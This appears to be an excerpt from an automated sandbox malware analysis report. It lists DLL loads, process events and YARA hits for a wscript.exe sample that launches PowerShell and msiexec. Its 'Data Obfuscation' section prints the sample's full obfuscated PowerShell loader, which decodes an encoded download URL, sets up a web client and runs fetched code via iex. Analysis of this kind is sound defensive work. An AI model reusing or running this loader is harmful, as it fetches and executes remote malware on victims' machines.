              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wininet.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: schannel.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mskeyprotect.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncryptsslp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winmm.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rstrtmgr.dll
              Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: agement.Automation.pdb source: powershell.exe, 00000005.00000002.1741303006.0000000007339000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1741303006.0000000007378000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.1341689491.00000223AF8E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1344430785.00000223AFAE1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdb source: powershell.exe, 00000005.00000002.1741303006.0000000007407000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: ShellExecute("powershell", "";$handsaws='Underhive';;$Hjlpevinduern", "", "", "0");
              Source: Yara match | File source: 00000005.00000002.1748291655.000000000994F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.1748100726.0000000008700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.1728698519.0000000005995000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000002.00000002.1538011083.00000248688D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($ideposer)$GlobAl:AdENoiDIsM = [SySTeM.tEXT.enCoDInG]::aSCii.GETsTRING($GLasPUStERNE)$gLoBaL:iNTerImsBeViSErS=$adEnoIDisM.subsTriNG($DRSlagEnES,$nATuralISErINgER)<#Semipreserved Timon
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Technical235 $Vesuvite $Udredningsarbejde), (Quaintish @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Pedestrian = [AppDomain]::CurrentDomain.GetAssemblie
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Elendil)), $Gnomezombie).DefineDynamicModule($Folioarkenes209, $false).DefineType($Battutas, $Fruitlets, [System.MulticastDelegate])$L
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($ideposer)$GlobAl:AdENoiDIsM = [SySTeM.tEXT.enCoDInG]::aSCii.GETsTRING($GLasPUStERNE)$gLoBaL:iNTerImsBeViSErS=$adEnoIDisM.subsTriNG($DRSlagEnES,$nATuralISErINgER)<#Semipreserved Timon
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$handsaws='Underhive';;$Hjlpevinduernes='genernrr';;$Skovspurvenes='Folkekre';;$Fremsende='Peddigrrets';;$kbelysten=$host.Name; function Astroite($Moedt){If ($kbelysten) {$Potheen='Madelines214';$Spildendes=4;$Racketlike=$Spildendes}do{$Harpers+=$Moedt[$Racketlike];$Racketlike+=5} until(!$Moedt[$Racketlike])$Harpers}function Forvanskende($Piphas119){ .($criminologist) ($Piphas119)}$Redefinerende=Astroite 'vascnVer,e roeT Oto.UhyrW';$Redefinerende+=Astroite 'charEmel,B Si,CAnetL skiIbreceFeltNK.ont';$Adkomsthaveren=Astroite 'ChepMUnwooK lizRangiLattlst nl Cena Pom/';$knippelgodes=Astroite ' nkT Es lLei s Vit1Plat2';$Grillhandske='Corv[ StanAnlgE inatHjti.OpkasForseF rsR,ineVRudlICo tCBareESlu P SkyoPhotiTendNRealtBr dM UndAUdvanFo fABombG Br e Gr RFol ]Mu,f:Upwe: Il,SGoodeUkolc emuF emRSt mIErraTInteySup.pBen.RPatiO GentUndrOAn yCKlonODia lTi.s= up$s rakM.ndn Acti D.sPKolopRa ie PrsL oweGFlasOByggd V.lEIndfS';$Adkomsthaveren+=Astroite 'Un,a5Hum .Fis.0Bill ,and(Ov rWBoobiKernn MosdB rtoSlotw BoosHand BypNRe,gTpent Re y1Fork0Fa n.Ausp0over; F.n MussW Efti Carn.dea6Neur4Ophi; Syl Wi.dxBhin6Pinm4Cama;Mo,b Drosr F rvQuad:sket1Tot 3Hous1Indg. La 0Urop) Ger GennGonyceT.gtc prokUne o Ind/skal2Josi0Pins1 Ord0Fu o0 Frm1Ov r0P op1Aeg. 
CyklF,fpaiCombrTeate UndfStyloDef x Spa/ g s1Orch3 mo,1 Men.dato0';$Racketlikenddateringsfase=Astroite ' .utUUnmuSConse F eR Fo - Raca S rGSta.eMor,n verT';$Aandsaristokratens=Astroite 'DoblhUndetSa dtStrapAntesS mm:Skru/opsl/ Timi frugClep2RentcOr,h.KlapiAtelc Ancu Tra/KludZDopitComby groSBiorv.ctuRBystyL ngzSeis/ RevBMblelTrvluHemisGrimt AppeoverrRinkeRhinrDiff.Dor dSpadeSkarpsodfl Como enzy';$Tryksager=Astroite ' elm>';$criminologist=Astroite 'Hulli BonEBat.x';$Lnindkomsts='Noncontingency';$breadbox='\misinforms.Non';Forvanskende (Astroite ' Skr$Rm bgSv nLparaoTappBMa uAU melBema:FaktcShrii hosFllesbehaEOpunlPuin= Und$Uns.ESandnIntoVDien:Jac AUn epCullpKammdAnglAElektPs uA Sub+Fo n$ EskBSubsrBarneThora PlaDDepeB D mOSni X');Forvanskende (Astroite ' an$Sprog.krsLSti OKlieBRefaAB.ggL A.k:Subcg RumRChowA RekMU deMChicONeooFAfveoParan MokEMicrRS agSPely=Baz $F,beAOutwAJab,NNaphDTrres EagA cykRObseICop,SHkketEntiOPennk TypRKlynaEdapt inge.jern dsmSOutw. Va,SsubdPVerdLUnsiINa sT Fry( Ski$spectS lvR ssiy.rank Bars Teka hangKemie raR Cal)');Forvanskende (Astroite $Grillhandske);$Aandsaristokratens=$Grammofoners[0];$Couloir4=(Astroite ',obb$SurnGPublL BikoSupebBazeAFantl lin: rinDStibi,ornf A hfhalmECongRHeadE UdrNUdebTCohaiundeaUnth= ,erNCedae DoyWSkil- DiboB,dgbF rrjM skE eluc afht Udr WatSunmoYDhfpSTribTEctoeCaroMhyst. Ven$SvarRS weeskylD ouseUnexfOpunIDissN dviE B kr rane,arsNKa tdu dee');Forvanskende ($Couloir4);Forvanskende (Astroite ' Moo$ yloD Bu,i.obbfAandfSonneTartr .ydeSkafnL,svt SyriUnivaFio . enHSexte.neoaSchfdUdgieEjerrGemisSemi[ti m$ AgrR rkba Forc Klukkerme ,nttO,idl Unsi.riuk I le S.hn vald
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$handsaws='Underhive';;$Hjlpevinduernes='genernrr';;$Skovspurvenes='Folkekre';;$Fremsende='Peddigrrets';;$kbelysten=$host.Name; function Astroite($Moedt){If ($kbelysten) {$Potheen='Madelines214';$Spildendes=4;$Racketlike=$Spildendes}do{$Harpers+=$Moedt[$Racketlike];$Racketlike+=5} until(!$Moedt[$Racketlike])$Harpers}function Forvanskende($Piphas119){ .($criminologist) ($Piphas119)}$Redefinerende=Astroite 'vascnVer,e roeT Oto.UhyrW';$Redefinerende+=Astroite 'charEmel,B Si,CAnetL skiIbreceFeltNK.ont';$Adkomsthaveren=Astroite 'ChepMUnwooK lizRangiLattlst nl Cena Pom/';$knippelgodes=Astroite ' nkT Es lLei s Vit1Plat2';$Grillhandske='Corv[ StanAnlgE inatHjti.OpkasForseF rsR,ineVRudlICo tCBareESlu P SkyoPhotiTendNRealtBr dM UndAUdvanFo fABombG Br e Gr RFol ]Mu,f:Upwe: Il,SGoodeUkolc emuF emRSt mIErraTInteySup.pBen.RPatiO GentUndrOAn yCKlonODia lTi.s= up$s rakM.ndn Acti D.sPKolopRa ie PrsL oweGFlasOByggd V.lEIndfS';$Adkomsthaveren+=Astroite 'Un,a5Hum .Fis.0Bill ,and(Ov rWBoobiKernn MosdB rtoSlotw BoosHand BypNRe,gTpent Re y1Fork0Fa n.Ausp0over; F.n MussW Efti Carn.dea6Neur4Ophi; Syl Wi.dxBhin6Pinm4Cama;Mo,b Drosr F rvQuad:sket1Tot 3Hous1Indg. La 0Urop) Ger GennGonyceT.gtc prokUne o Ind/skal2Josi0Pins1 Ord0Fu o0 Frm1Ov r0P op1Aeg. 
CyklF,fpaiCombrTeate UndfStyloDef x Spa/ g s1Orch3 mo,1 Men.dato0';$Racketlikenddateringsfase=Astroite ' .utUUnmuSConse F eR Fo - Raca S rGSta.eMor,n verT';$Aandsaristokratens=Astroite 'DoblhUndetSa dtStrapAntesS mm:Skru/opsl/ Timi frugClep2RentcOr,h.KlapiAtelc Ancu Tra/KludZDopitComby groSBiorv.ctuRBystyL ngzSeis/ RevBMblelTrvluHemisGrimt AppeoverrRinkeRhinrDiff.Dor dSpadeSkarpsodfl Como enzy';$Tryksager=Astroite ' elm>';$criminologist=Astroite 'Hulli BonEBat.x';$Lnindkomsts='Noncontingency';$breadbox='\misinforms.Non';Forvanskende (Astroite ' Skr$Rm bgSv nLparaoTappBMa uAU melBema:FaktcShrii hosFllesbehaEOpunlPuin= Und$Uns.ESandnIntoVDien:Jac AUn epCullpKammdAnglAElektPs uA Sub+Fo n$ EskBSubsrBarneThora PlaDDepeB D mOSni X');Forvanskende (Astroite ' an$Sprog.krsLSti OKlieBRefaAB.ggL A.k:Subcg RumRChowA RekMU deMChicONeooFAfveoParan MokEMicrRS agSPely=Baz $F,beAOutwAJab,NNaphDTrres EagA cykRObseICop,SHkketEntiOPennk TypRKlynaEdapt inge.jern dsmSOutw. Va,SsubdPVerdLUnsiINa sT Fry( Ski$spectS lvR ssiy.rank Bars Teka hangKemie raR Cal)');Forvanskende (Astroite $Grillhandske);$Aandsaristokratens=$Grammofoners[0];$Couloir4=(Astroite ',obb$SurnGPublL BikoSupebBazeAFantl lin: rinDStibi,ornf A hfhalmECongRHeadE UdrNUdebTCohaiundeaUnth= ,erNCedae DoyWSkil- DiboB,dgbF rrjM skE eluc afht Udr WatSunmoYDhfpSTribTEctoeCaroMhyst. Ven$SvarRS weeskylD ouseUnexfOpunIDissN dviE B kr rane,arsNKa tdu dee');Forvanskende ($Couloir4);Forvanskende (Astroite ' Moo$ yloD Bu,i.obbfAandfSonneTartr .ydeSkafnL,svt SyriUnivaFio . enHSexte.neoaSchfdUdgieEjerrGemisSemi[ti m$ AgrR rkba Forc Klukkerme ,nttO,idl Unsi.riuk I le S.hn vald
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF886D03312 push eax; retf 2_2_00007FF886D03321
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0474191C push es; iretd 5_2_04741923
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_04741AF2 push ds; iretd 5_2_04741AF3
              Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (86 identical entries collapsed)
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX (4 identical entries collapsed)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5078
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4801
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8074
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1597
